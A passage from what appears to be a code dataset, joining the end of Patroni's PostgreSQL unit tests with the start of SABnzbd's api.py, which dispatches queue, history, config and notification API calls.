self.p.config['wale'] = {'command': 'foo', 'no_master': 1}
self.assertTrue(self.p.can_create_replica_without_replication_connection())
def test_replica_method_can_work_without_replication_connection(self):
self.assertFalse(self.p.replica_method_can_work_without_replication_connection('basebackup'))
self.assertFalse(self.p.replica_method_can_work_without_replication_connection('foobar'))
self.p.config['foo'] = {'command': 'bar', 'no_master': 1}
self.assertTrue(self.p.replica_method_can_work_without_replication_connection('foo'))
self.p.config['foo'] = {'command': 'bar'}
self.assertFalse(self.p.replica_method_can_work_without_replication_connection('foo'))
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
def test_reload_config(self):
parameters = self._PARAMETERS.copy()
parameters.pop('f.oo')
config = {'pg_hba': [''], 'use_unix_socket': True, 'authentication': {},
'retry_timeout': 10, 'listen': '*', 'parameters': parameters}
self.p.reload_config(config)
parameters['b.ar'] = 'bar'
self.p.reload_config(config)
parameters['autovacuum'] = 'on'
self.p.reload_config(config)
parameters['autovacuum'] = 'off'
parameters.pop('search_path')
config['listen'] = '*:5433'
self.p.reload_config(config)
parameters['unix_socket_directories'] = '.'
self.p.reload_config(config)
self.p.resolve_connection_addresses()
@patch.object(Postgresql, '_version_file_exists', Mock(return_value=True))
def test_get_major_version(self):
with patch.object(builtins, 'open', mock_open(read_data='9.4')):
self.assertEqual(self.p.get_major_version(), 90400)
with patch.object(builtins, 'open', Mock(side_effect=Exception)):
self.assertEqual(self.p.get_major_version(), 0)
def test_postmaster_start_time(self):
with patch.object(MockCursor, "fetchone", Mock(return_value=('foo', True, '', '', '', '', False))):
self.assertEqual(self.p.postmaster_start_time(), 'foo')
with patch.object(MockCursor, "execute", side_effect=psycopg2.Error):
self.assertIsNone(self.p.postmaster_start_time())
def test_check_for_startup(self):
with patch('subprocess.call', return_value=0):
self.p._state = 'starting'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
with patch('subprocess.call', return_value=1):
self.p._state = 'starting'
self.assertTrue(self.p.check_for_startup())
self.assertEqual(self.p.state, 'starting')
with patch('subprocess.call', return_value=2):
self.p._state = 'starting'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'start failed')
with patch('subprocess.call', return_value=0):
self.p._state = 'running'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
with patch('subprocess.call', return_value=127):
self.p._state = 'running'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
self.p._state = 'starting'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
def test_wait_for_startup(self):
state = {'sleeps': 0, 'num_rejects': 0, 'final_return': 0}
self.__thread_ident = current_thread().ident
def increment_sleeps(*args):
if current_thread().ident == self.__thread_ident:
print("Sleep")
state['sleeps'] += 1
def isready_return(*args):
ret = 1 if state['sleeps'] < state['num_rejects'] else state['final_return']
print("Isready {0} {1}".format(ret, state))
return ret
def time_in_state(*args):
return state['sleeps']
with patch('subprocess.call', side_effect=isready_return):
with patch('time.sleep', side_effect=increment_sleeps):
self.p.time_in_state = Mock(side_effect=time_in_state)
self.p._state = 'stopped'
self.assertTrue(self.p.wait_for_startup())
self.assertEqual(state['sleeps'], 0)
self.p._state = 'starting'
state['num_rejects'] = 5
self.assertTrue(self.p.wait_for_startup())
self.assertEqual(state['sleeps'], 5)
self.p._state = 'starting'
state['sleeps'] = 0
state['final_return'] = 2
self.assertFalse(self.p.wait_for_startup())
self.p._state = 'starting'
state['sleeps'] = 0
state['final_return'] = 0
self.assertFalse(self.p.wait_for_startup(timeout=2))
self.assertEqual(state['sleeps'], 3)
with patch.object(Postgresql, 'check_startup_state_changed', Mock(return_value=False)):
self.p.cancel()
self.p._state = 'starting'
self.assertIsNone(self.p.wait_for_startup())
def test_pick_sync_standby(self):
cluster = Cluster(True, None, self.leader, 0, [self.me, self.other, self.leadermem], None,
SyncState(0, self.me.name, self.leadermem.name), None)
with patch.object(Postgresql, "query", return_value=[
(self.leadermem.name, 'streaming', 'sync'),
(self.me.name, 'streaming', 'async'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.leadermem.name, True))
with patch.object(Postgresql, "query", return_value=[
(self.me.name, 'streaming', 'async'),
(self.leadermem.name, 'streaming', 'potential'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.leadermem.name, False))
with patch.object(Postgresql, "query", return_value=[
(self.me.name, 'streaming', 'async'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.me.name, False))
with patch.object(Postgresql, "query", return_value=[
('missing', 'streaming', 'sync'),
(self.me.name, 'streaming', 'async'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.me.name, False))
with patch.object(Postgresql, "query", return_value=[]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (None, False))
def test_set_sync_standby(self):
def value_in_conf():
with open(os.path.join(self.data_dir, 'postgresql.conf')) as f:
for line in f:
if line.startswith('synchronous_standby_names'):
return line.strip()
mock_reload = self.p.reload = Mock()
self.p.set_synchronous_standby('n1')
self.assertEqual(value_in_conf(), "synchronous_standby_names = 'n1'")
mock_reload.assert_called()
mock_reload.reset_mock()
self.p.set_synchronous_standby('n1')
mock_reload.assert_not_called()
self.assertEqual(value_in_conf(), "synchronous_standby_names = 'n1'")
self.p.set_synchronous_standby('n2')
mock_reload.assert_called()
self.assertEqual(value_in_conf(), "synchronous_standby_names = 'n2'")
mock_reload.reset_mock()
self.p.set_synchronous_standby(None)
mock_reload.assert_called()
self.assertEqual(value_in_conf(), None)
def test_get_server_parameters(self):
config = {'synchronous_mode': True, 'parameters': {'wal_level': 'hot_standby'}, 'listen': '0'}
self.p.get_server_parameters(config)
config['synchronous_mode_strict'] = True
self.p.get_server_parameters(config)
self.p.set_synchronous_standby('foo')
self.p.get_server_parameters(config)
@patch('time.sleep', Mock())
def test__wait_for_connection_close(self):
mock_postmaster = MockPostmaster()
with patch.object(Postgresql, 'is_running', Mock(return_value=mock_postmaster)):
mock_postmaster.is_running.side_effect = [True, False, False]
mock_callback = Mock()
self.p.stop(on_safepoint=mock_callback)
mock_postmaster.is_running.side_effect = [True, False, False]
with patch.object(MockCursor, "execute", Mock(side_effect=psycopg2.Error)):
self.p.stop(on_safepoint=mock_callback)
def test_terminate_starting_postmaster(self):
mock_postmaster = MockPostmaster()
self.p.terminate_starting_postmaster(mock_postmaster)
mock_postmaster.signal_stop.assert_called()
mock_postmaster.wait.assert_called()
def test_read_postmaster_opts(self):
m = mock_open(read_data='/usr/lib/postgres/9.6/bin/postgres "-D" "data/postgresql0" \
"--listen_addresses=127.0.0.1" "--port=5432" "--hot_standby=on" "--wal_level=hot_standby" \
"--wal_log_hints=on" "--max_wal_senders=5" "--max_replication_slots=5"\n')
with patch.object(builtins, 'open', m):
data = self.p.read_postmaster_opts()
self.assertEqual(data['wal_level'], 'hot_standby')
self.assertEqual(int(data['max_replication_slots']), 5)
self.assertEqual(data.get('D'), None)
m.side_effect = IOError
data = self.p.read_postmaster_opts()
self.assertEqual(data, dict())
@patch('subprocess.Popen')
def test_single_user_mode(self, subprocess_popen_mock):
subprocess_popen_mock.return_value.wait.return_value = 0
self.assertEqual(self.p.single_user_mode('CHECKPOINT', {'archive_mode': 'on'}), 0)
@patch('os.listdir', Mock(side_effect=[OSError, ['a', 'b']]))
@patch('os.unlink', Mock(side_effect=OSError))
@patch('os.remove', Mock())
@patch('os.path.islink', Mock(side_effect=[True, False]))
@patch('os.path.isfile', Mock(return_value=True))
def test_cleanup_archive_status(self):
self.p.cleanup_archive_status()
self.p.cleanup_archive_status()
@patch('os.unlink', Mock())
@patch('os.path.isfile', Mock(return_value=True))
@patch.object(Postgresql, 'single_user_mode', Mock(return_value=0))
def test_fix_cluster_state(self):
self.assertTrue(self.p.fix_cluster_state())
def test_replica_cached_timeline(self):
self.assertEqual(self.p.replica_cached_timeline(1), 2)
def test_get_master_timeline(self):
self.assertEqual(self.p.get_master_timeline(), 1)
def test_cancellable_subprocess_call(self):
self.p.cancel()
self.assertRaises(PostgresException, self.p.cancellable_subprocess_call, communicate_input=None)
@patch('patroni.postgresql.polling_loop', Mock(return_value=[0, 0]))
def test_cancel(self):
self.p._cancellable = Mock()
self.p._cancellable.returncode = None
self.p.cancel()
type(self.p._cancellable).returncode = PropertyMock(side_effect=[None, -15])
self.p.cancel()
@patch.object(Postgresql, 'get_postgres_role_from_data_directory', Mock(return_value='replica'))
def test__build_effective_configuration(self):
with patch.object(Postgresql, 'controldata',
Mock(return_value={'max_connections setting': '200',
'max_worker_processes setting': '20',
'max_prepared_xacts setting': '100',
'max_locks_per_xact setting': '100'})):
self.p.cancel()
self.assertFalse(self.p.start())
self.assertTrue(self.p.pending_restart)
|
api.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2020 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.api - api
"""
import os
import logging
import re
import gc
import datetime
import time
import json
import cherrypy
import locale
from threading import Thread
try:
import win32api
import win32file
except ImportError:
pass
import sabnzbd
from sabnzbd.constants import (
VALID_ARCHIVES,
VALID_NZB_FILES,
Status,
FORCE_PRIORITY,
NORMAL_PRIORITY,
INTERFACE_PRIORITIES,
KIBI,
MEBI,
GIGI,
)
import sabnzbd.config as config
import sabnzbd.cfg as cfg
from sabnzbd.skintext import SKIN_TEXT
from sabnzbd.utils.pathbrowser import folders_at_path
from sabnzbd.utils.getperformance import getcpu
from sabnzbd.misc import (
loadavg,
to_units,
int_conv,
time_format,
cat_convert,
create_https_certificates,
calc_age,
opts_to_pp,
)
from sabnzbd.filesystem import diskspace, get_ext, globber_full, clip_path, remove_all, userxbit
from sabnzbd.encoding import xml_name
from sabnzbd.utils.servertests import test_nntp_server_dict
from sabnzbd.getipaddress import localipv4, publicipv4, ipv6, addresslookup
from sabnzbd.database import build_history_info, unpack_history_info, HistoryDB
import sabnzbd.notifier
import sabnzbd.rss
import sabnzbd.emailer
import sabnzbd.sorting
##############################################################################
# API error messages
##############################################################################
_MSG_NO_VALUE = "expects one parameter"
_MSG_NO_VALUE2 = "expects two parameters"
_MSG_INT_VALUE = "expects integer value"
_MSG_NO_ITEM = "item does not exist"
_MSG_NOT_IMPLEMENTED = "not implemented"
_MSG_NO_FILE = "no file given"
_MSG_NO_PATH = "file does not exist"
_MSG_OUTPUT_FORMAT = "Format not supported"
_MSG_NO_SUCH_CONFIG = "Config item does not exist"
_MSG_CONFIG_LOCKED = "Configuration locked"
_MSG_BAD_SERVER_PARMS = "Incorrect server settings"
# For Windows: determine executable extensions
if os.name == "nt":
PATHEXT = os.environ.get("PATHEXT", "").lower().split(";")
else:
PATHEXT = []
def api_handler(kwargs):
""" API Dispatcher """
if cfg.api_logging():
# Was it proxy forwarded?
xff = cherrypy.request.headers.get("X-Forwarded-For")
if xff:
logging.debug(
"API-call from %s (X-Forwarded-For: %s) [%s] %s",
cherrypy.request.remote.ip,
xff,
cherrypy.request.headers.get("User-Agent", "??"),
kwargs,
)
else:
logging.debug(
"API-call from %s [%s] %s",
cherrypy.request.remote.ip,
cherrypy.request.headers.get("User-Agent", "??"),
kwargs,
)
# Clean-up the arguments
for vr in ("mode", "output", "name"):
if vr in kwargs and isinstance(kwargs[vr], list):
kwargs[vr] = kwargs[vr][0]
mode = kwargs.get("mode", "")
output = kwargs.get("output", "")
name = kwargs.get("name", "")
if mode not in ("version", "auth"):
msg = sabnzbd.interface.check_apikey(kwargs)
if msg:
return report(output, msg)
response = _api_table.get(mode, (_api_undefined, 2))[0](name, output, kwargs)
return response
def _api_get_config(name, output, kwargs):
""" API: accepts output, keyword, section """
_, data = config.get_dconfig(kwargs.get("section"), kwargs.get("keyword"))
return report(output, keyword="config", data=data)
def _api_set_config(name, output, kwargs):
""" API: accepts output, keyword, section """
if cfg.configlock():
return report(output, _MSG_CONFIG_LOCKED)
if kwargs.get("section") == "servers":
kwargs["keyword"] = handle_server_api(output, kwargs)
elif kwargs.get("section") == "rss":
kwargs["keyword"] = handle_rss_api(output, kwargs)
elif kwargs.get("section") == "categories":
kwargs["keyword"] = handle_cat_api(output, kwargs)
else:
res = config.set_config(kwargs)
if not res:
return report(output, _MSG_NO_SUCH_CONFIG)
config.save_config()
res, data = config.get_dconfig(kwargs.get("section"), kwargs.get("keyword"))
return report(output, keyword="config", data=data)
def _api_set_config_default(name, output, kwargs):
""" API: Reset requested config variables back to defaults. Currently only for misc-section """
if cfg.configlock():
return report(output, _MSG_CONFIG_LOCKED)
keywords = kwargs.get("keyword", [])
if not isinstance(keywords, list):
keywords = [keywords]
for keyword in keywords:
item = config.get_config("misc", keyword)
if item:
item.set(item.default())
config.save_config()
return report(output)
def _api_del_config(name, output, kwargs):
""" API: accepts output, keyword, section """
if cfg.configlock():
return report(output, _MSG_CONFIG_LOCKED)
if del_from_section(kwargs):
return report(output)
else:
return report(output, _MSG_NOT_IMPLEMENTED)
def _api_queue(name, output, kwargs):
""" API: Dispatcher for mode=queue """
value = kwargs.get("value", "")
return _api_queue_table.get(name, (_api_queue_default, 2))[0](output, value, kwargs)
def _api_queue_delete(output, value, kwargs):
""" API: accepts output, value """
if value.lower() == "all":
removed = sabnzbd.NzbQueue.remove_all(kwargs.get("search"))
return report(output, keyword="", data={"status": bool(removed), "nzo_ids": removed})
elif value:
items = value.split(",")
delete_all_data = int_conv(kwargs.get("del_files"))
removed = sabnzbd.NzbQueue.remove_multiple(items, delete_all_data=delete_all_data)
return report(output, keyword="", data={"status": bool(removed), "nzo_ids": removed})
else:
return report(output, _MSG_NO_VALUE)
def _api_queue_delete_nzf(output, value, kwargs):
""" API: accepts value(=nzo_id), value2(=nzf_id) """
value2 = kwargs.get("value2")
if value and value2:
removed = sabnzbd.NzbQueue.remove_nzf(value, value2, force_delete=True)
return report(output, keyword="", data={"status": bool(removed), "nzf_ids": removed})
else:
return report(output, _MSG_NO_VALUE2)
def _api_queue_rename(output, value, kwargs):
""" API: accepts output, value(=old name), value2(=new name), value3(=password) """
value2 = kwargs.get("value2")
value3 = kwargs.get("value3")
if value and value2:
ret = sabnzbd.NzbQueue.change_name(value, value2, value3)
return report(output, keyword="", data={"status": ret})
else:
return report(output, _MSG_NO_VALUE2)
def _api_queue_change_complete_action(output, value, kwargs):
""" API: accepts output, value(=action) """
sabnzbd.change_queue_complete_action(value)
return report(output)
def _api_queue_purge(output, value, kwargs):
""" API: accepts output """
removed = sabnzbd.NzbQueue.remove_all(kwargs.get("search"))
return report(output, keyword="", data={"status": bool(removed), "nzo_ids": removed})
def _api_queue_pause(output, value, kwargs):
""" API: accepts output, value(=list of nzo_id) """
if value:
items = value.split(",")
handled = sabnzbd.NzbQueue.pause_multiple_nzo(items)
else:
handled = False
return report(output, keyword="", data={"status": bool(handled), "nzo_ids": handled})
def _api_queue_resume(output, value, kwargs):
""" API: accepts output, value(=list of nzo_id) """
if value:
items = value.split(",")
handled = sabnzbd.NzbQueue.resume_multiple_nzo(items)
else:
handled = False
return report(output, keyword="", data={"status": bool(handled), "nzo_ids": handled})
def _api_queue_priority(output, value, kwargs):
""" API: accepts output, value(=nzo_id), value2(=priority) """
value2 = kwargs.get("value2")
if value and value2:
try:
try:
priority = int(value2)
except:
return report(output, _MSG_INT_VALUE)
pos = sabnzbd.NzbQueue.set_priority(value, priority)
# Returns the position in the queue, -1 is incorrect job-id
return report(output, keyword="position", data=pos)
except:
return report(output, _MSG_NO_VALUE2)
else:
return report(output, _MSG_NO_VALUE2)
def _api_queue_sort(output, value, kwargs):
""" API: accepts output, sort, dir """
sort = kwargs.get("sort")
direction = kwargs.get("dir", "")
if sort:
sabnzbd.NzbQueue.sort_queue(sort, direction)
return report(output)
else:
return report(output, _MSG_NO_VALUE2)
def _api_queue_default(output, value, kwargs):
""" API: accepts output, sort, dir, start, limit """
start = int_conv(kwargs.get("start"))
limit = int_conv(kwargs.get("limit"))
search = kwargs.get("search")
info, pnfo_list, bytespersec = build_queue(start=start, limit=limit, output=output, search=search)
return report(output, keyword="queue", data=info)
def _api_queue_rating(output, value, kwargs):
""" API: accepts output, value(=nzo_id), type, setting, detail """
vote_map = {"up": sabnzbd.Rating.VOTE_UP, "down": sabnzbd.Rating.VOTE_DOWN}
flag_map = {
"spam": sabnzbd.Rating.FLAG_SPAM,
"encrypted": sabnzbd.Rating.FLAG_ENCRYPTED,
"expired": sabnzbd.Rating.FLAG_EXPIRED,
"other": sabnzbd.Rating.FLAG_OTHER,
"comment": sabnzbd.Rating.FLAG_COMMENT,
}
content_type = kwargs.get("type")
setting = kwargs.get("setting")
if value:
try:
video = audio = vote = flag = None
if content_type == "video" and setting != "-":
video = setting
if content_type == "audio" and setting != "-":
audio = setting
if content_type == "vote":
vote = vote_map[setting]
if content_type == "flag":
flag = flag_map[setting]
if cfg.rating_enable():
sabnzbd.Rating.update_user_rating(value, video, audio, vote, flag, kwargs.get("detail"))
return report(output)
except:
return report(output, _MSG_BAD_SERVER_PARMS)
else:
return report(output, _MSG_NO_VALUE)
def _api_options(name, output, kwargs):
""" API: accepts output """
return options_list(output)
def _api_translate(name, output, kwargs):
""" API: accepts output, value(=acronym) """
return report(output, keyword="value", data=T(kwargs.get("value", "")))
def _api_addfile(name, output, kwargs):
""" API: accepts name, output, pp, script, cat, priority, nzbname """
# Normal upload will send the nzb in a kw arg called name or nzbfile
if not name or isinstance(name, str):
name = kwargs.get("nzbfile", None)
if hasattr(name, "file") and hasattr(name, "filename") and name.filename:
cat = kwargs.get("cat")
xcat = kwargs.get("xcat")
if not cat and xcat:
# Indexer category, so do mapping
cat = cat_convert(xcat)
# Add the NZB-file
res, nzo_ids = sabnzbd.add_nzbfile(
name,
pp=kwargs.get("pp"),
script=kwargs.get("script"),
cat=cat,
priority=kwargs.get("priority"),
nzbname=kwargs.get("nzbname"),
password=kwargs.get("password"),
)
return report(output, keyword="", data={"status": res == 0, "nzo_ids": nzo_ids})
else:
return report(output, _MSG_NO_VALUE)
def _api_retry(name, output, kwargs):
""" API: accepts name, output, value(=nzo_id), nzbfile(=optional NZB), password (optional) """
value = kwargs.get("value")
# Normal upload will send the nzb in a kw arg called nzbfile
if name is None or isinstance(name, str):
name = kwargs.get("nzbfile")
password = kwargs.get("password")
password = password[0] if isinstance(password, list) else password
nzo_id = retry_job(value, name, password)
if nzo_id:
return report(output, keyword="", data={"status": True, "nzo_id": nzo_id})
else:
return report(output, _MSG_NO_ITEM)
def _api_cancel_pp(name, output, kwargs):
""" API: accepts name, output, value(=nzo_id) """
nzo_id = kwargs.get("value")
if sabnzbd.PostProcessor.cancel_pp(nzo_id):
return report(output, keyword="", data={"status": True, "nzo_id": nzo_id})
else:
return report(output, _MSG_NO_ITEM)
def _api_addlocalfile(name, output, kwargs):
""" API: accepts name, output, pp, script, cat, priority, nzbname """
if name:
if os.path.exists(name):
pp = kwargs.get("pp")
script = kwargs.get("script")
cat = kwargs.get("cat")
xcat = kwargs.get("xcat")
if not cat and xcat:
# Indexer category, so do mapping
cat = cat_convert(xcat)
priority = kwargs.get("priority")
nzbname = kwargs.get("nzbname")
password = kwargs.get("password")
if get_ext(name) in VALID_ARCHIVES + VALID_NZB_FILES:
res, nzo_ids = sabnzbd.add_nzbfile(
name,
pp=pp,
script=script,
cat=cat,
priority=priority,
keep=True,
nzbname=nzbname,
password=password,
)
return report(output, keyword="", data={"status": res == 0, "nzo_ids": nzo_ids})
else:
logging.info('API-call addlocalfile: "%s" is not a supported file', name)
return report(output, _MSG_NO_FILE)
else:
logging.info('API-call addlocalfile: file "%s" not found', name)
return report(output, _MSG_NO_PATH)
else:
logging.info("API-call addlocalfile: no file name given")
return report(output, _MSG_NO_VALUE)
def _api_switch(name, output, kwargs):
""" API: accepts output, value(=first id), value2(=second id) """
value = kwargs.get("value")
value2 = kwargs.get("value2")
if value and value2:
pos, prio = sabnzbd.NzbQueue.switch(value, value2)
# Returns the new position and new priority (if different)
return report(output, keyword="result", data={"position": pos, "priority": prio})
else:
return report(output, _MSG_NO_VALUE2)
def _api_change_cat(name, output, kwargs):
""" API: accepts output, value(=nzo_id), value2(=category) """
value = kwargs.get("value")
value2 = kwargs.get("value2")
if value and value2:
nzo_id = value
cat = value2
if cat == "None":
cat = None
result = sabnzbd.NzbQueue.change_cat(nzo_id, cat)
return report(output, keyword="status", data=bool(result > 0))
else:
return report(output, _MSG_NO_VALUE)
def _api_change_script(name, output, kwargs):
""" API: accepts output, value(=nzo_id), value2(=script) """
value = kwargs.get("value")
value2 = kwargs.get("value2")
if value and value2:
nzo_id = value
script = value2
if script.lower() == "none":
script = None
result = sabnzbd.NzbQueue.change_script(nzo_id, script)
return report(output, keyword="status", data=bool(result > 0))
else:
return report(output, _MSG_NO_VALUE)
def _api_change_opts(name, output, kwargs):
""" API: accepts output, value(=nzo_id), value2(=pp) """
value = kwargs.get("value")
value2 = kwargs.get("value2")
result = 0
if value and value2 and value2.isdigit():
result = sabnzbd.NzbQueue.change_opts(value, int(value2))
return report(output, keyword="status", data=bool(result > 0))
def _api_fullstatus(name, output, kwargs):
""" API: full history status"""
status = build_status(skip_dashboard=kwargs.get("skip_dashboard", 1), output=output)
return report(output, keyword="status", data=status)
def _api_history(name, output, kwargs):
""" API: accepts output, value(=nzo_id), start, limit, search """
value = kwargs.get("value", "")
start = int_conv(kwargs.get("start"))
limit = int_conv(kwargs.get("limit"))
last_history_update = int_conv(kwargs.get("last_history_update", 0))
search = kwargs.get("search")
failed_only = int_conv(kwargs.get("failed_only"))
categories = kwargs.get("category")
# Do we need to send anything?
if last_history_update == sabnzbd.LAST_HISTORY_UPDATE:
return report(output, keyword="history", data=False)
if categories and not isinstance(categories, list):
categories = [categories]
if not limit:
limit = cfg.history_limit()
if name == "delete":
special = value.lower()
del_files = bool(int_conv(kwargs.get("del_files")))
if special in ("all", "failed", "completed"):
history_db = sabnzbd.get_db_connection()
if special in ("all", "failed"):
if del_files:
del_job_files(history_db.get_failed_paths(search))
history_db.remove_failed(search)
if special in ("all", "completed"):
history_db.remove_completed(search)
sabnzbd.history_updated()
return report(output)
elif value:
jobs = value.split(",")
for job in jobs:
del_hist_job(job, del_files)
sabnzbd.history_updated()
return report(output)
else:
return report(output, _MSG_NO_VALUE)
elif not name:
history = {}
grand, month, week, day = sabnzbd.BPSMeter.get_sums()
history["total_size"], history["month_size"], history["week_size"], history["day_size"] = (
to_units(grand),
to_units(month),
to_units(week),
to_units(day),
)
history["slots"], fetched_items, history["noofslots"] = build_history(
start=start, limit=limit, search=search, failed_only=failed_only, categories=categories
)
history["last_history_update"] = sabnzbd.LAST_HISTORY_UPDATE
history["version"] = sabnzbd.__version__
return report(output, keyword="history", data=history)
else:
return report(output, _MSG_NOT_IMPLEMENTED)
def _api_get_files(name, output, kwargs):
""" API: accepts output, value(=nzo_id) """
value = kwargs.get("value")
if value:
return report(output, keyword="files", data=build_file_list(value))
else:
return report(output, _MSG_NO_VALUE)
def _api_addurl(name, output, kwargs):
""" API: accepts name, output, pp, script, cat, priority, nzbname """
pp = kwargs.get("pp")
script = kwargs.get("script")
cat = kwargs.get("cat")
priority = kwargs.get("priority")
nzbname = kwargs.get("nzbname", "")
password = kwargs.get("password", "")
if name:
nzo_id = sabnzbd.add_url(name, pp, script, cat, priority, nzbname, password)
# Reporting a list of NZO's, for compatibility with other add-methods
return report(output, keyword="", data={"status": True, "nzo_ids": [nzo_id]})
else:
logging.info("API-call addurl: no URLs recieved")
return report(output, _MSG_NO_VALUE)
def _api_pause(name, output, kwargs):
""" API: accepts output """
sabnzbd.Scheduler.plan_resume(0)
sabnzbd.Downloader.pause()
return report(output)
def _api_resume(name, output, kwargs):
""" API: accepts output """
sabnzbd.Scheduler.plan_resume(0)
sabnzbd.unpause_all()
return report(output)
def _api_shutdown(name, output, kwargs):
""" API: accepts output """
sabnzbd.shutdown_program()
return report(output)
def _api_warnings(name, output, kwargs):
""" API: accepts name, output """
if name == "clear":
return report(output, keyword="warnings", data=sabnzbd.GUIHANDLER.clear())
elif name == "show":
return report(output, keyword="warnings", data=sabnzbd.GUIHANDLER.content())
elif name:
return report(output, _MSG_NOT_IMPLEMENTED)
return report(output, keyword="warnings", data=sabnzbd.GUIHANDLER.content())
def _api_get_cats(name, output, kwargs):
""" API: accepts output """
return report(output, keyword="categories", data=list_cats(False))
def _api_get_scripts(name, output, kwargs):
""" API: accepts output """
return report(output, keyword="scripts", data=list_scripts())
def _api_version(name, output, kwargs):
""" API: accepts output """
return report(output, keyword="version", data=sabnzbd.__version__)
def _api_auth(name, output, kwargs):
""" API: accepts output """
auth = "None"
if not cfg.disable_key():
auth = "badkey"
key = kwargs.get("key", "")
if not key:
auth = "apikey"
else:
if key == cfg.nzb_key():
auth = "nzbkey"
if key == cfg.api_key():
auth = "apikey"
elif cfg.username() and cfg.password():
auth = "login"
return report(output, keyword="auth", data=auth)
def _api_restart(name, output, kwargs):
""" API: accepts output """
logging.info("Restart requested by API")
# Do the shutdown async to still send goodbye to browser
Thread(target=sabnzbd.trigger_restart, kwargs={"timeout": 1}).start()
return report(output)
def _api_restart_repair(name, output, kwargs):
""" API: accepts output """
logging.info("Queue repair requested by API")
sabnzbd.request_repair()
# Do the shutdown async to still send goodbye to browser
Thread(target=sabnzbd.trigger_restart, kwargs={"timeout": 1}).start()
return report(output)
def _api_disconnect(name, output, kwargs):
""" API: accepts output """
sabnzbd.Downloader.disconnect()
return report(output)
def _api_osx_icon(name, output, kwargs):
""" API: accepts output, value """
value = kwargs.get("value", "1").strip()
cfg.osx_menu.set(value != "0")
return report(output)
def _api_rescan(name, output, kwargs):
""" API: accepts output """
sabnzbd.NzbQueue.scan_jobs(all_jobs=False, action=True)
return report(output)
def _api_eval_sort(name, output, kwargs):
""" API: evaluate sorting expression """
name = kwargs.get("name", "")
value = kwargs.get("value", "")
title = kwargs.get("title")
multipart = kwargs.get("movieextra", "")
path = sabnzbd.sorting.eval_sort(value, title, name, multipart)
if path is None:
return report(output, _MSG_NOT_IMPLEMENTED)
else:
return report(output, keyword="result", data=path)
def _api_watched_now(name, output, kwargs):
""" API: accepts output """
sabnzbd.DirScanner.scan()
return report(output)
def _api_resume_pp(name, output, kwargs):
""" API: accepts output """
sabnzbd.PostProcessor.paused = False
return report(output)
def _api_pause_pp(name, output, kwargs):
""" API: accepts output """
sabnzbd.PostProcessor.paused = True
return report(output)
def _api_rss_now(name, output, kwargs):
""" API: accepts output """
# Run RSS scan async, because it can take a long time
sabnzbd.Scheduler.force_rss()
return report(output)
def _api_retry_all(name, output, kwargs):
""" API: Retry all failed items in History """
return report(output, keyword="status", data=retry_all_jobs())
def _api_reset_quota(name, output, kwargs):
""" Reset quota left """
sabnzbd.BPSMeter.reset_quota(force=True)
return report(output)
def _api_test_email(name, output, kwargs):
""" API: send a test email, return result """
logging.info("Sending test email")
pack = {"download": ["action 1", "action 2"], "unpack": ["action 1", "action 2"]}
res = sabnzbd.emailer.endjob(
"I had a d\xe8ja vu",
"unknown",
True,
os.path.normpath(os.path.join(cfg.complete_dir.get_path(), "/unknown/I had a d\xe8ja vu")),
123 * MEBI,
None,
pack,
"my_script",
"Line 1\nLine 2\nLine 3\nd\xe8ja vu\n",
0,
test=kwargs,
)
if res == T("Email succeeded"):
return report(output)
return report(output, error=res)
def _api_test_windows(name, output, kwargs):
""" API: send a test to Windows, return result """
logging.info("Sending test notification")
res = sabnzbd.notifier.send_windows("SABnzbd", T("Test Notification"), "other")
return report(output, error=res)
def _api_test_notif(name, output, kwargs):
""" API: send a test to Notification Center, return result """
logging.info("Sending test notification")
res = sabnzbd.notifier.send_notification_center("SABnzbd", T("Test Notification"), "other")
return report(output, error=res)
def _api_test_osd(name, output, kwargs):
""" API: send a test OSD notification, return result """
logging.info("Sending OSD notification")
res = sabnzbd.notifier.send_notify_osd("SABnzbd", T("Test Notification"))
return report(output, error=res)
def _api_test_prowl(name, output, kwargs):
""" API: send a test Prowl notification, return result """
logging.info("Sending Prowl notification")
res = sabnzbd.notifier.send_prowl("SABnzbd", T("Test Notification"), "other", force=True, test=kwargs)
return report(output, error=res)
def _api_test_pushover(name, output, kwargs):
""" API: send a test Pushover notification, return result """
logging.info("Sending Pushover notification")
res = sabnzbd.notifier.send_pushover("SABnzbd", T("Test Notification"), "other", force=True, test=kwargs)
return report(output, error=res)
def _api_test_pushbullet(name, output, kwargs):
""" API: send a test Pushbullet notification, return result """
logging.info("Sending Pushbullet notification")
res = sabnzbd.notifier.send_pushbullet("SABnzbd", T("Test Notification"), "other", force=True, test=kwargs)
return report(output, error=res)
def _api_test_nscript(name, output, kwargs):
""" API: execute a test notification script, return result """
logging.info("Executing notification script")
res = sabnzbd.notifier.send_nscript("SABnzbd", T("Test Notification"), "other", force=True, test=kwargs)
return report(output, error=res)
def _api_undefined(name, output, kwargs):
""" API: accepts output """
return report(output, _MSG_NOT_IMPLEMENTED)
def _api_browse(name, output, kwargs):
""" Return tree of local path """
compact = kwargs.get("compact")
if compact and compact == "1":
name = kwargs.get("term", "")
paths = [entry["path"] for entry in folders_at_path(os.path.dirname(name)) if "path" in entry]
return report(output, keyword="", data=paths)
else:
